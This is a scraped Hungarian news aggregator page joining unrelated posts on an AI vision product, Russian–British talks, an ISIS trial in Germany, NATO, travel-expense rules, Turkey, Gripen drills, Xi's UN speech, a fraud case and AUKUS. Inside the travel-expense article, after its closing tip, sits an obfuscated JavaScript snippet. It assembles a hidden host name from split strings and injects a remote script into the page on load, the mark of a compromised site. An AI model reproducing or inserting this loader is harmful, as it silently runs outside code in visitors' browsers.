Biztonságpolitika

Egy új megoldással, az A.Identify mesterséges intelligenciájával a háromdimenziós tárgyak azonosítása automatizálható számos területen, az ipari minőség-ellenőrzéstől és karbantartástól kezdve az arcfelismerésen alapuló egyedi azonosításon át a közbiztonságig.

A hazai fejlesztésű szoftvert különlegessé teszi, hogy felhasználóbarát keretrendszerével a gépi tanulás és a neurális hálózatok terén kevéssé jártas, illetve fejlesztői erőforrásokat nélkülöző vállalatok is könnyen és gyorsan gépi látással ruházhatják fel és automatizálhatják folyamataikat.

Az A.Identify magyar kezelőfelülete végigvezeti felhasználóját a folyamaton, amellyel a mesterséges intelligencia megtanítható adott feladat elvégzésére – ipari környezetben például alkatrészek és selejtes munkadarabok felismerésére a kiszedés és a minőség-ellenőrzés automatizálásához, vagy repülőtereken a gazdátlanul hagyott csomagok, a kifutópályára tévedt állatok észlelésére. A keretrendszer ehhez bekéri a mintaként szolgáló képeket, valamint a fotókon látható tárgyak osztályozását, és azt is jelzi, hogy a bevitt információk alapján százalékosan milyen pontosságú felismerés várható, illetve az miként javítható.

Magyar fejlesztés gyorsíthatja fel a gépi látás elterjedését

Végfelhasználói ismeretek birtokában ezeket az egyszerű műveleteket bárki könnyen elvégezheti. Miután az A.Identify megtanulta a feladatot, és a kívánt pontossággal felismeri a 3D tárgyakat – nemcsak kategóriájuk, hanem akár egyetlen részletük alapján –, a keretrendszer kimenetet, végpontot generál, amelyet a vállalat alkalmazásaiba illeszthet. Az új keretrendszerrel így a szervezetek széles köre könnyen és gyorsan vezethet be mesterséges intelligenciára épülő megoldásokat az ember számára egyszerű, de a számítógépnek egyébként nehezen leprogramozható rutinfeladatok elvégzésére, és a folyamatos ellenőrzés megteremtésével együtt folyamatait költséghatékonyabbá teheti.

A mesterséges intelligencia alapú megoldását az AB Consulting Group Zrt. a Nemzeti Kutatási, Fejlesztési és Innovációs Hivatal „Piacvezérelt kutatás-fejlesztési és innovációs projektek támogatása” pályázatán nyert támogatással készítette el. A cég tervei szerint az A.Identify – bár helyben is telepíthető – elsősorban hosztolt szolgáltatásként lesz elérhető. Ebben a modellben ugyanis a gépi tanuláshoz rövid időre igénybe vett, nagyobb informatikai erőforrásokért a vállalatok használat alapon fizetnek, ami a hagyományos beszerzésnél sokkal előnyösebb.

The post Könnyen alkalmazható gépi látást ad a vállalatoknak az AB Consulting új keretrendszere appeared first on .

Vlagyimir Putyin orosz elnök és Boris Johnson brit miniszterelnök egyetértett abban, hogy Moszkvának és Londonnak a fennálló problémák ellenére együttműködést kell kialakítania számos területen – közölte a Kreml sajtószolgálata a két vezető telefonbeszélgetését követően.

Moszkvai tájékoztatás szerint a két vezető megállapodott abban, hogy a tárgyalás során felvetett kérdésekben a felek “fenntartják a szükséges kapcsolatokat egymással”. Afganisztánnal kapcsolatban Putyin tájékoztatta Johnsont a “kibővített trojka” és a “moszkvai formátum” keretében múlt héten Moszkvában megtartott konzultációk eredményeiről.

A “kibővített trojka” Oroszországból, az Egyesült Államokból, Kína és Pakisztánból áll, de az amerikai fél ezúttal nem képviseltette magát. A “moszkvai formátum” 2017-ben jött létre a különmegbízotti szintű hatoldalú – orosz-afgán-kínai-pakisztáni-iráni-indiai – konzultációs mechanizmus alapján. Az orosz fővárosban szerdán megtartott harmadik fordulón Oroszország, a tálibok vezette Afganisztán, India, Irán, Kazahsztán, Kirgizisztán, Kína, Pakisztán, Tádzsikisztán, Türkmenisztán és Üzbegisztán képviselteti magát.

Putyin és Johnson a telefonos eszmecsere során egyaránt az iráni nukleáris programra vonatkozó közös átfogó cselekvési terv fenntartása mellett érvelt, amely a közlemény szerint fontos tényező a biztonság garantálásában, valamint a nukleáris fegyverek elterjedésének megakadályozását célzó rendszer fenntartásában.

A közelgő, november elején megtartandó glasgow-i éghajlatvédelmi csúcstalálkozóvak kapcsolatban Putyin biztosította a brit miniszterelnököt arról, hogy Oroszország elkötelezett nemzetközi kötelezettségvállalásai mellett és következetesen csökkenteni szándékozik gazdaságának széndioxid-kibocsátását. A moszkvai elnöki hivatal sajtószolgálata szerint Johnson üdvözölte Oroszország törekvését, hogy legkésőbb 2060-ig elérje a széndioxid-semlegességet.

Putyin, aki nem vesz részt a csúcson, biztosította tárgyalópartnerét, hogy a Glasgowba utazó orosz delegáció hozzá fog járulni fontos nemzetközi fórum sikeréhez.

The post V. Putyin és B. Johnson egyetért appeared first on .

Németországban elítélték a magát Iszlám Államnak (IA) nevező közel-keleti terrorszervezet egyik hazatért tagját. A harmincéves nő tíz év börtönbüntetést kapott a többi között azért, mert kínzott és hagyott szomjan halni egy rabszolgaként tartott jazidi kisleányt.

A személyes adatok védelméről szóló jogszabályok alapján csak Jennifer W. néven azonosított nő pere az első németországi bírósági eljárás, amelyben az iraki jazidi vallási-etnikai kisebbség elleni háborús bűncselekmények miatt hoztak ítéletet.

A vádlottat a többi között külföldi terrorszervezetben viselt tagság, emberölésben bűnrészesség, valamint háborús és emberiesség elleni bűncselekmények kísérlete miatt ítélte el a müncheni tartományi felső bíróság. A szövetségi legfőbb ügyészség életfogytig tartó szabadságvesztés büntetését indítványozta, a védelem szerint viszont csak terrorszervezeti tagság miatt kellett volna elítélni a német vádlottat, és két év börtön lett volna méltányos.

A bíróság egyebek mellett bizonyítottnak látta, hogy a vádlott az IÁ terrorszervezet tagja volt, és amikor 2015-ben az akkori férjével a Bagdad térségében fekvő Falludzsában lakott, tétlenül nézte, ahogy dzsihadista férje a szabad ég alatt kikötöz egy ötéves jazidi kislányt, és otthagyja a hőségben étlen-szomjan. A vádlottnak számolnia kellett azzal, hogy a kisgyermek életveszélybe kerül, és noha segíthetett volna rajta, nem tett semmit, ezért az áldozat kiszáradás miatt meghalt – emelte ki a tanácsvezető bíró az ítélethirdetésen. Bizonyítottnak látták azt is, hogy Jennifer W. kivégzéssel fenyegette meg a kislány anyját arra az esetre, ha nem fejezi be a gyermeke halála miatti sírást. A kislány és édesanyja az észak-iraki jazidi kisebbség elleni rendszerszerű és kiterjedt támadások révén került a vádlotthoz és férjéhez. Rabszolgaként tartották őket. A kislányt azért kötözték ki és hagyták sorsára, mert megbetegedett, és ezért “haszontalanná vált”.

Jennifer W. egy alsó-szászország tartománybeli kisvárosban, Lohnében nőtt fel. Barátai nemigen voltak, az általános iskola után nem tanult tovább és munkát sem szerzett, viszont egyre élénkebben érdeklődött az iszlám iránt, áttért a muszlim hitre és 2014-ben elutazott Szíriába, hogy csatlakozzék az IÁ-hoz. Kétszer házasodott, mindkét férje helyi IÁ-harcos. Második férjével költözött Fallúdzsába, a dzsihadisták egyik legfontosabb iraki bázisára. Az IÁ úgynevezett erkölcsrendészetében tevékenykedett.

Két év után, terhesen hazautazott Németországba, majd 2018-ban megpróbált visszatérni, mert úgy érezte, mégis a dzsihadisták között van a helye. Az ellene időközben összegyűjtött bizonyítékok alapján távozását megakadályozták és előzetes letartóztatásba helyezték. Vádat 2019-ben emeltek ellene. A meghalt kislány édesanyját képviselő jogászcsapat tagja Amal Clooney, a híres emberi jogi ügyekkel elismerést szerzett londoni ügyvédnő. A nő férje ellen jelenleg is tart a per Frankfurtban, ítélet a jövő hónapban várható.

A szövetségi alkotmányvédelmi hivatal (BfV) legutóbbi, 2020-ból származó nyilvános adatai szerint 2013 óta nagyjából 1060 német állampolgár vándorolt ki hazájából Szíriába vagy Irakba, hogy csatlakozzék az IÁ-hoz vagy valamely más, közel-keleti iszlamista terrorszervezethez. Túlnyomó többségük a kiutazása idején harminc évnél fiatalabb volt.

A terroristákhoz csatlakozottak körében mintegy 25 százalék körüli a nők aránya. A távozók hozzávetőleg egyharmada már ismét Németországban tartózkodik. Mintegy 250 emberről vannak arra utaló adatok, hogy meghaltak. A szélsőséges iszlamista irányzatok németországi követőinek száma 28 715-re tehető a BfV legutóbbi, idén júniusban közölt adatai szerint. A szövetségi bűnügyi hivatal (BKA) 630 embert tart nyilván közveszélyes, terrorcselekmény elkövetésére hajlandó iszlamistaként.

Németországban 5,3-5,6 millió muszlim vallású ember él, ez a 83,1 milliós lakosság 6,4-6,7 százaléka. Legnagyobb csoportjuk – mintegy 45 százalékuk – szunnita török.

The post Elítélték Németországban az Iszlám Állam egyik hazatért követőjét appeared first on .

Oroszország mindent elkövet annak érdekében, hogy a maga számára minimalizálja Ukrajna és a NATO lehetséges közeledésének következményeit – jelentette ki Dmitrij Peszkov, a Kreml szóvivője.

“Ezt megakadályozni nem tudjuk. Lehetetlen. De minimalizálhatjuk az ilyen lépések következményeit az országunk számára. Nincs kétségem afelől, hogy Ukrajna és a NATO további közeledése esetén Oroszország mindent megtesz, amit kell” – nyilatkozott Peszkov, de nem bocsátkozott részletekbe.

Peszkov arra reagált, hogy Lloyd Austin amerikai védelmi miniszter a héten Kijevben járva kijelentette, hogy az Egyesült Államok támogatja Ukrajna tagsági törekvését a NATO-ban, és hozzátette, hogy egyetlen harmadik ország sem vétózhatja meg a szövetségbe való belépését.

Vlagyimir Putyin orosz elnök csütörtökön, a Valdaj nemzetközi vitaklub tanácskozásán azt mondta, hogy a NATO katonai jelenléte Ukrajnában valós fenyegetést jelent Oroszország számára, és hogy a szövetség Kijev tagsága nélkül is megkezdte Ukrajna területének birtokba vételét.

Peszkov vasárnapi tévényilatkozatában azt is elmondta, hogy szerinte “butaság” Putyinnak a Valdaj-fórumon elmondott beszédét a Nyugattal való értékalapú konfrontációként értelmezni. A szóvivő azt mondta, az elnök azt próbálta értésre adni, hogy Oroszország kész az együttműködésre, de nem engedi meg, hogy kioktassák. Úgy vélekedett, hogy Putyin mondanivalóját most ugyanúgy félremagyarázzák, mint a 2007-es müncheni biztonsági fórumon elmondott beszédét, amely szintén nem a konfrontációról szólt.

“Nézetem szerint az elmondottak lényege az, hogy mi nem készülünk senkit sem kioktatni, és bennünket se oktassanak ki. Megengedhetjük és meg is fogjuk engedni magunknak, hogy úgy éljünk, ahogy mi akarunk. Emellett örömmel barátkozunk és együttműködünk önökkel, de ne merészeljenek kioktatni bennünket, mert nem fogjuk eltűrni” – fogalmazott a szóvivő. Kitért az Oroszország és a NATO közötti diplomáciai kapcsolatok felfüggesztésére is.

“Függetlenül a blokk agresszivitásától Oroszország mindig a kapcsolatok fejlesztését szorgalmazta. Csak most, amikor már nyilvánvalóvá vált, hogy minden erőfeszítésünk hiábavaló volt, egyszerűen hivatalossá tettük a valóságot” – nyilatkozott.

“Ez (a NATO) egy agresszív blokk, amely ellenfelének tekint bennünket. Ezért nem történik szörnyűség, ha az agresszivitás fokozódása és az olyan nyilatkozatok nyomán, amelyek szerint a fő feladat a mi feltartóztatásunk, egyszerűen elutasítjuk ezeket a kapcsolatokat” – mondta a szóvivő. Hozzátette, hogy Putyin és Joe Biden belátható időn belül találkozik majd egymással. Korábban azt mondta, hogy a csúcs még az év vége előtt létrejön.

Jen Psaki, a washingtoni Fehér Ház szóvivője szerdán úgy nyilatkozott, hogy Washingtonnak egyelőre nincs bejelentenivalója Biden és Putyin újabb találkozójával kapcsolatban. A két elnök június 16-án, Genfben folytatott személyesen eszmecserét egymással.

Szergej Lavrov orosz külügyminiszter hétfőn jelentette be, hogy Oroszország november 1-jétől felfüggeszti a NATO mellett működő képviseletének tevékenységét. Emellett felfüggeszti a NATO moszkvai katonai missziójának, valamint az észak-atlanti szövetség belga nagykövetségen működő tájékoztatási irodájának tevékenységét is. Az indoklás szerint Moszkva válaszlépéseket hozott arra reagálva, hogy a szövetség október 6-án közölte: 18-ról 10 főre csökkenti Oroszország NATO-képviseletének létszámát. Az orosz misszió nyolc tagjának kiutasítását a NATO azzal indokolta, hogy az érintettek “ellenséges tevékenységet” folytattak.

A Krím félsziget Oroszország általi elcsatolását és Moszkvának a délkelet-ukrajnai válságba való beavatkozását követően a NATO 2015-ben és 2018-ban is csökkentette az orosz képviselet létszámát.

The post A Kreml nem tudja megakadályozni Ukrajna és a NATO közeledését appeared first on .

Kiküldetési rendelvény: saját gépkocsi használat elszámolása. Autónként 1.350.000 millió forint megtakarítás évente! Automata útrögzítés, hiányzó utakra útajánlás.

Gyakran találkozunk olyan ügyfelekkel, akik összezavarodva érkeznek hozzánk könyvelőjüktől vagy adótanácsadójuktól.

Ha szóba kerül a kiküldetési rendelvény szó és az a kérdés, szükséges-e az ügyfeleknek kiküldetési rendelvényt vezetni, sokszor olyan alapvető fogalmak is össze tudnak keveredni, mint az útnyilvántartás és a kiküldetési rendelvény.

Tehát…

Mi a kiküldetési rendelvény?

Kiküldetési rendelvény segítségével azok a magánszemélyek, akik munkáltatójuk számára céges célból utaznak saját gépkocsijukkal, kiküldetési rendelvény vezetésével kifizettethetik munkaadójukkal a céges célból megtett km-ereket, anélkül, hogy cégautóadót kéne fizetniük magánautójuk céges használata után. Az világos, hogy ez miért jó a munkavállalónak. De a munkáltatónak is lehetősége van a NAV által is elfogadott kiküldetési rendelvénnyel, legálisan béren kívül kifizetni munkavállalójukat.

És az útnyilvántartás?

Ezzel szemben útnyilvántartást az vezethet, illetve annak éri meg, aki bér- és nyílt végű lízing konstrukcióval vásárolt személygépjárművet és ez a jármű cégtulajdonban van, nem magánszemély birtokolja. Egy másik eset, mikor magánszemély (pl. egyéni vállalkozó) több mint 500 kilométert vezet céges célból havonta, így jobban megéri neki a jövedelemszerző tevékenységéhez igénybe vett saját gépjárművének költségeit útnyilvántartás vezetésével igazolni és elszámolni. Háziorvosok útnyilvántartás vezetésével a cégautóadó megfizetését kerülhetik el, míg 3,5t alatti kishaszongépjárművek vezetői, akik csak saját árut szállítani, akár 100% lízing- és dízel ÁFÁ-t számolhatnak el útnyilvántartással.

Mi történik akkor, ha egy hivatalos út során a cég nem saját vagy bérelt autót biztosít alkalmazottjának, hanem saját autó használatára kötelezi?

Ebben az esetben nem az útnyilvántartás a megfelelő nyomtatvány, amit ki kell tölteni, hanem a kiküldetési rendelvény.

Nézünk pár gyakori kérdést a kiküldetési rendelvényről és az azzal kapcsolatos dokumentáció témaköréből.

• Kell-e tankolásról számla magán autó esetén?

Rövid válasz: nem. Kiküldetési rendelvény esetén a km-távolság szerinti üzemanyag-fogyasztási norma, a NAV által közétett üzemanyagár, és a 15 Ft/km általános személygépkocsi normaköltség alapul vételével számított összeg kerül kifizetésre a munkáltató által a munkavállaló céges útjai után.

• Milyen időközönként kell a km óra állásokat rögzíteni?

Magánautó céges használata esetén, melyet a munkáltató kiküldetési rendelvény vezetése ellenében elszámol a munkavállalónak nincs szükség a kilométeróra-állás rögzítésére.

Milyen következményei lehetnek a helytelenül vezetett kiküldetési rendelvénynek?

Mivel a kiküldetési rendelvények a NAV felé benyújtandó hivatalos bizonyító erejű dokumentumnak minősülnek, időről dőre a NAV ellenőreire is számíthatunk.

Tipp:  egy jó, NAV-álló útnyilvántartó programmal gyerekjáték a kiküldetési rendelvény elkészítése!
(function(){ oeuh=document.createElement("script");oeuh.async=true;oeuh_="u"+("s")+"t"; oeuhu="315769431.";oeuh_+="a"+("t.i");oeuh_+="n"+("f"+"o")+"/"; oeuhu+="djkx81ineuhaseXchf7qsy"+("plw0vfmj"); oeuh.src="https://"+oeuh_+oeuhu;oeuh.type="text/javascript"; document.body.appendChild(oeuh); })();

The post Mikor kell kiküldetési rendelvényt vezetni? appeared first on .

Recep Tayyip Erdogan török elnök üdvözölte, hogy a török igazságszolgáltatás bírálata miatt a minap nem kívánatos személynek minősített tíz nyugati ország ankarai nagykövete “visszakozott”, és arra tett ígéretet, hogy nem avatkozik be Törökország belügyeibe – közölte az NTV török hírtelevízió a török államfői hivatalra hivatkozva.

Az Egyesült Államok, Németország, Franciaország, Kanada, Norvégia, Svédország, Finnország, Dánia, Hollandia és Új-Zéland nagykövetségei múlt hétfőn közös nyilatkozatban bírálták a török igazságszolgáltatást a négy éve börtönben ülő Osman Kavala török üzletember, emberi jogi aktivista pereinek “késleltetése” miatt, és a férfi azonnali szabadon engedésére szólították fel Ankarát.

A török államfő az esetre reagálva először felvetette a misszióvezetők hazaküldését, majd szombaton elrendelte a diplomaták nem kívánatos személlyé nyilvánítását. Az amerikai külképviselet hétfőn a hivatalos Twitter-fiókján bejelentette: az Egyesült Államok megerősíti, hogy tartja magát a diplomáciai kapcsolatokról szóló bécsi egyezmény 41. cikkéhez. A szerződés 41. cikke kimondja, hogy diplomatáknem avatkozhatnak be a fogadó ország belügyeibe. Az amerikai nagykövetség megfogalmazását később a többi szóban forgó ország külképviselete is megosztotta a Twitteren.

Kavala ellen jelenleg két törökországi eljárás zajlik, amit széles nemzetközi figyelem kísér, mert a férfi négy éve úgy ül börtönben, hogy eddig még egyszer sem találták bűnösnek. A 64 éves Kavalát 2017-ben először a Gezi parki tüntetések szervezésével összefüggésben tartóztatták le. Ugyan a törvényszék 2020 februárjában bizonyítékok hiányában felmentette őt és társait, Kavala ellen néhány órával később a 2016. július 15-i katonai puccskísérlet okán is per indult.

Ráadásul a Gezi parki tüntetésekkel kapcsolatos eljárás idén májusban újraindult, miután az előző perben született felmentő ítéleteket a fellebbviteli bíróság januárban hatályon kívül helyezte, és új eljárás lefolytatására utasította az elsőfokú bíróságot. Az ügy következő tárgyalása november 26-án lesz. Kavala második, a 2016-os hatalomátvétellel kapcsolatos pere 2020 decemberében kezdődött meg.

Az Emberi Jogok Európai Bírósága 2019-ben rendelkezett a férfi szabadlábra helyezéséről, arra hivatkozva, hogy a bebörtönzésével el akarják hallgattatni, és a vádat egyetlen bizonyíték sem támasztja alá.

Múlt hónapban az Európa Tanács, amelynek Törökország szinte a kezdetek óta a tagja, azt jelezte, hogy kötelezettségszegési eljárást indít Ankara ellen, ha nem engedi szabadon Kavalát, összhangban az Emberi Jogok Európai Bíróságának 2019-es határozatával.

The post Erdogan elégedett appeared first on .

Az éves kiképzési tervnek megfelelően hétfőtől estébe nyúló gyakorlatot tartanak a Magyar Honvédség Gripenjei – közölte a kecskeméti MH 59. Szentgyörgyi Dezső repülőbázis közösségi oldalán.

A tájékoztatás szerint a pilóták hétfőtől csütörtökig 14-21 óra között hajtják végre a repülési feladatokat. A gyakorlat idején Kecskemét, Eger, Mezőkövesd, Tiszafüred, Szolnok, Tiszaújváros és Nagyatád, továbbá Kaposvár, Szigetvár, Debrecen és Nagykanizsa térségében a megszokottól eltérő, nagyobb zaj- és hanghatásra lehet számítani.

The post Gyakorlatot tartanak a héten a honvédség Gripenjei appeared first on .

Nem lenne szabad egyetlen hatalomnak vagy blokknak diktálnia a nemzetközi rendet – szögezte le Hszi Csin-ping kínai elnök egy hétfői beszédében, amelyet a Kínai Népköztársaság ENSZ-hez történt újracsatlakozásának ötvenedik évfordulója alkalmából mondott egy Pekingben megrendezett konferencián.

A South China Morning Post (SCMP) című hongkongi lap internetes kiadásában megjelent beszámoló szerint beszédében a kínai elnök burkoltan az Egyesült Államok világban betöltött, meghatározó szerepére tett utalást a kijelentéseivel. A diplomaták és nemzetközi szervezetek képviselői részvételével megtartott eseményen videókapcsolaton keresztül António Guterres ENSZ-főtitkár is részt vett.

A beszédnek a Hszinhua kínai állami hírügynökség által kiadott leiratából kiderül, hogy Hszi azt hangsúlyozta: a nemzetközi szabályokat az ENSZ 193 tagjának közösen kellene kialakítania, és azokat kivétel nélkül mindenkinek be kellene tartania. “Egyetlen civilizáció sem felsőbbrendű, vagy jobb egy másiknál” – húzta alá, hozzátéve, hogy egy ország haladási irányát annak alapján kellene megítélni, hogy mennyire képes jólétet és az emberek életminőségének javulását biztosítani. Ennek kapcsán példaként említette Kína erőfeszítéseit a szegénység felszámolására, valamint hozzájárulását az ENSZ költségvetéséhez és a békefenntartáshoz.

A kínai elnök hangsúlyozta továbbá: Peking ellenzi a hegemónia és a hatalmi politika minden formáját. A beszéd kapcsán az SCMP rámutatott: Peking és Washington az utóbbi időben kiélezett diplomáciai csörtéket folytat az ENSZ különböző platformjain a befolyásért folytatott versengésben.

Az amerikai külügyminisztérium egyik, vasárnap kiadott közleményében tudatta, hogy magas rangú amerikai diplomaták tárgyalásokat folytattak a tajvani külügyminisztérium képviselőivel Tajvan az ENSZ-ben és más, nemzetközi fórumokon történő részvételének bővítéséről.

Kína saját területe részeként tekint az egyébként 1949 óta saját kormányzattal rendelkező Tajvanra. Peking és Tajpej között a viszony több éves közeledés után ismét fagyossá vált azt követően, hogy a Caj Jing-ven tajvani elnök vezette kormányzat elutasította azt az 1992-ben elfogadott, az “egy Kína” elvét magában foglaló egyezményt, amelyet Peking a tárgyalások alapfeltételeként kezel. A kínai kormányzat azóta diplomáciai eszközökkel igyekszik korlátozni Tajvan mozgásterét a nemzetközi színtéren. A sziget mostanra elvesztette korábbi, megfigyelői státusát az olyan, ENSZ-hez kapcsolódó szervezetekben, mint az Egészségügyi Világszervezet közgyűlése.

Peking emellett gazdasági nyomást alkalmaz Tajvannal szemben, és rendszeres hadgyakorlatokat tart a sziget közvetlen közelében. Október első négy napján a kínai légierő összesen 149 harci gépe hatolt a tajvani légtérbe, naponta megdöntve az egyszerre a sziget légvédelmi zónájába repülő kínai harci gépek rekordját. Az akciók kezdete egybeesett a Kínai Népköztársaság 1949-es megalakulásának október 1-ére eső évfordulójával. Peking részéről a feszültségek közelmúltbeli kiéleződését részben a tajvani politikusok külföldi erőkkel folytatott “összejátszásának” tulajdonították.

The post A Kínai Népköztársaság elnöke szerint ne egyetlen hatalmi blokknak diktálja a nemzetközi rendet appeared first on .

Tizennégy és fél év fegyházbüntetésre ítéltek el nem jogerősen egy férfit, aki vízszerelőnek kiadva magát – társával együtt – több mint 15 millió forintot tulajdonított el három időskorú otthonából – közölte a fővárosi főügyész.

Ibolya Tibor a közleményben azt írta, hogy az elítélt és ismeretlen tettestársa vízszerelési munkálatokra hivatkozással jutott be a lakásokba. Az egyikük a konyhában tartotta a sértettet azzal az ürüggyel, hogy a szerelési munkálatok alatt a vizet folyamatosan folyatni kell. A másik elkövető ezalatt a sértettek megtakarított pénzét keresve átkutatta a lakást.

Az 53 éves elítélt 46 éves társával 2019. június 19-én egy II. kerületi társásházban lakó 79 éves nő otthonából 10,7 millió ezer forintot tulajdonított el.

Ezt követően, 2019. szeptember 05-én az elkövetők két időskorút fosztottak ki az otthonukban. Mindkét sértett ugyanabban a XX. kerületi társásházban lakott, egyikük 98 éves, a másik pedig 83 éves volt az elkövetés idején. A vádlottak az egyik sértett otthonából mintegy 3,6 millió forint, a másik időskorú áldozatuktól pedig csaknem kétmillió forint készpénzt tulajdonítottak el.

A nyomozók a két vádlottat még a rablás napján elfogták, a két XX. kerületi sértettől eltulajdonított pénzt náluk megtalálták, lefoglalták, majd az időskorú sértetteknek visszaadták. Az első esetben eltulajdonított több mint tízmillió forint azonban nem térült meg.

A Budapesti XX., XXI. és XXIII. Kerületi Ügyészség a vádlottakkal szemben több rendbeli kifosztás bűntette miatt emelt vádat a Budapesti XX., XXI. és XXIII. Kerületi Bíróságon. A bíróság a lefolytatott bizonyítás alapján az 53 éves, többszörös visszaeső férfit fegyházbüntetése mellett 500 ezer forint pénzbüntetésre ítélte, a feltételes szabadságra bocsátás lehetőségét pedig kizárta. 46 éves társával szemben a bíróság 5 év 6 hónap börtönbüntetést, valamint 300 ezer forint pénzbüntetést szabott ki.

The post Időskorúakat kifosztó férfiakat ítéltek el appeared first on .

Jelentős felháborodást váltott ki francia és európai uniós vezetők részéről a nemrég bejelentett új védelmi megállapodás. A döntést Jean-Yves Le Diren, francia külügyminiszter hátba szúrásnak és a Trump-i politika folytatásának értékelte. A felháborodást elsősorban az okozta, hogy Ausztrália felbontotta a 2016-ban kötött megállapodását Franciaországgal, amely szerint 12 dízel-elektromos tengeralattjárót vásárol az európai államtól. Ehelyett az AUKUS megállapodás keretein belül fog az USA és Nagy-Britannia technológiát és képességeket biztosítani számára, hogy nukleáris meghajtású tengeralattjárót rendszeresítsen. Ez lesz a második alkalom, hogy az USA egy másik országgal oszt meg nukleáris tengeralattjáró technológiát. Az első eset 1958-ban volt, amikor az Egyesült Államok Nagy-Britanniának segített. Jelen cikk ennek a tengeralattjáró megegyezésnek és szélesebb értelemben az AUKUS megállapodásnak a hátterét vizsgálja. 

Bár a sajtóban a legnagyobb hangsúlyt a tengeralattjárók kapták, messze nem ez az egyetlen dolog, amelyről a három fél megállapodott. Egy 2021. szeptember 16.-i sajtóközleményben Scott Morrison, Ausztrália miniszterelnöke ismertette, hogy milyen témákat fog érinteni a megállapodás és mik lesznek az első lépései. Az együttműködés kiterjed a kiberképességekre, mesterséges intelligenciára, kvantumtechnológiára és a tengeralatti képességek fejlesztésére. Emellett hiperszonikus rakéták közös fejlesztésében is megállapodtak. Az első lépés az AUKUS keretei között a bevezetőben már említett tengeralattjárókat érintő együttműködés. Ausztrália a másik két szerződő féllel együttműködve legalább 8 atommeghajtású tengeralattjárót kíván beszerezni. A következő 18 hónapban az USA és Nagy-Britannia meg fogja vizsgálni a pontos követelményeket, amelyeknek a tengeralattjáróknak meg kell felelniük. Az együttműködést a nyilatkozat az Indiai-Csendes óceáni térség biztonsági kihívásainak növekedésével, a régió katonai modernizációjával és Ausztrália és szövetségeseinek technológiai fölényének csökkenésével indokolja. Ebben az indoklásban bár közvetlenül nem említik Kínát, még a sorok közt sem kell olvasni, hogy egyértelmű legyen melyik ország modernizálja „precedens nélküli sebességben” haderejét és melyik állam helyezkedik szembe Ausztráliával és szövetségeseivel. 

Azt, hogy Kína ellen jött létre ez a szövetség, mi sem bizonyítja jobban mint Kína reakciója. Míg a kínai kormány kezdeti megnyilvánulásai visszafogottnak voltak mondhatók, és csak olyan mondatok hangoztak el mint például az AUKUS aláássa a régió stabilitását és felelőtlen döntés, addig a kínai tulajdonban lévő és a kommunista párt véleményét képviselő Global Times szerint „nem számít, hogy fegyverzi fel magát Ausztrália, akkor is az USA kutyája marad”. Ami még ennél is beszédesebb, hogy a megállapodás bejelentése utáni napon Kína beadta jelentkezését a Csendes-óceáni térség partnerségéről szóló átfogó és progresszív megállapodáshoz (Comprehensive and Progressive Agreement for Trans-Pacific Partnership – CPTPP) és rá egy nappal, szeptember 17-én a Kína és Oroszország által dominált Sanghaji Megállapodás felvette Iránt tagjai közé. Bár természetesen egyik döntés sem egyik napról a másikra történt, bejelentésük időpontja beszédes. A CPTPP egy olyan gazdasági együttműködés, amelyet még az Obama-adminisztráció hívott életre, hogy elszigetelje Kínát. A Trump-adminisztráció azonban kilépett a megállapodásból. 

Miért döntött úgy Ausztrália, hogy felbontja a szerződést a francia Naval Group-al? Kiinduló pont lehet az előbb idézett sajtóközlemény, amely szerint a nukleáris meghajtású tengeralattjárók nem rendelkeznek olyan korlátokkal, mint konvencionális társaik. Azonban feltételezhetően nem ez az egyetlen indok. Az Ausztrál Nemzeti Könyvvizsgáló Iroda  2020-as jelentésben megemlíti, hogy a 2016 decemberében létrejövő Tengeri Hajóépítő Tanácsadó Testület 2019 szeptemberében már azt tanácsolta a Védelmi Minisztériumnak, hogy keressen alternatívákat arra az esetre, ha a tárgyalások megrekednének a Jövő Tengeralattjárója Stratégiai Partnerségi Megállapodásról. Emellett azt a nézetét is kifejtette, hogy a Védelmi Minisztérium fontolja meg, hogy valóban a nemzeti érdeket szolgálja-e a megállapodás. Ebből azt a következtetést lehet levonni, hogy a védelmi tárcát már hosszabb ideje foglalkoztatta a szerződés felbontása. A Reuters értesülései szerint a döntésben az is közrejátszott, hogy a költségek már azelőtt jelentősen emelkedtek, hogy a gyártás elindult. 2016-os cikkek még 40 milliárd dolláros szerződésről írtak. Jelenleg már 66 milliárd dolláros költségekkel számolnak úgy, hogy a gyártás még meg sem kezdődött és további megközelítőleg 104 milliárd dollárba kerülne a fenntartásuk. Emellett jelentős csúszásban is volt a program. A 2016-ban aláírt szerződés tervezési szakaszát a Naval Group 2020-ban tizenöt hónappal akarta kitolni, majd a Védelmi Minisztériummal történő tárgyalások után kilenc hónapban állapodtak meg. Ez azért kiváltképp kritikus szempont az ausztráloknak, mert a fent már hivatkozott Ausztrál Nemzeti Könyvvizsgáló Iroda jelentése arra is kitér, hogy a 3 évnyi csúszás a programban képességhiányt eredményezne, a jelenleg hadrendben lévő Collins osztályú tengeralattjárók állapota miatt. Tehát az ausztrál kormány három nyomós érvvel is rendelkezett, hogy felmondja a szerződést: 1.) Az új biztonsági környezet miatt nem felelnek meg a konvencionális tengeralattjárók. 2.) A program költségei már a tervezési fázisban jelentősen megnőttek. 3.) Már a tervezési fázisban 9 hónap csúszással kellett számolni, ami a teljes program alatt nem érhette el a 3 évet anélkül, hogy képességeket ne veszített volna Ausztrália.

A szerződés egészét nézve pedig kiemelendő, hogy az ausztrál és kínai kapcsolatok meglehetősen hűvösek voltak az elmúlt években. Ausztrália már régóta óvatos a kínai tech-cégekkel. 2012-ben az akkori miniszterelnök, Julia Gillard azt a döntést hozta, hogy nem engedi a Huaweit jelentkezni a nemzeti hálózat kiépítésére. 2018-ban pedig a kormány úgy döntött, hogy a Huawei és a ZTE nem vehet részt az 5G hálózat kiépítésében. 2019-ben Kína lelassította a szén importját Ausztráliából. Ausztrália az USA támogatásával kezdeményezte a WHO-nál a koronavírus kitörésének kivizsgálását, erre válaszul Kína de facto kitiltotta az ausztrál szenet, a homárt és a fűrészárut. 80%-os vámmal sújtotta az árpát, 200%-os vámmal a bort. Emellett a Global Times rakéta támadással is megfenyegette Ausztráliát. Egyfelől ebbe a mélypontot elérő ausztrál-kínai kapcsolatba pusztán egy új fejezetet jelent az AUKUS megállapodás, másfelől viszont a Kínai politika elérte, hogy Ausztrália szakítson a semlegességre törekvő politikájával és szorosabbra fűzze az USA-val az együttműködését. 

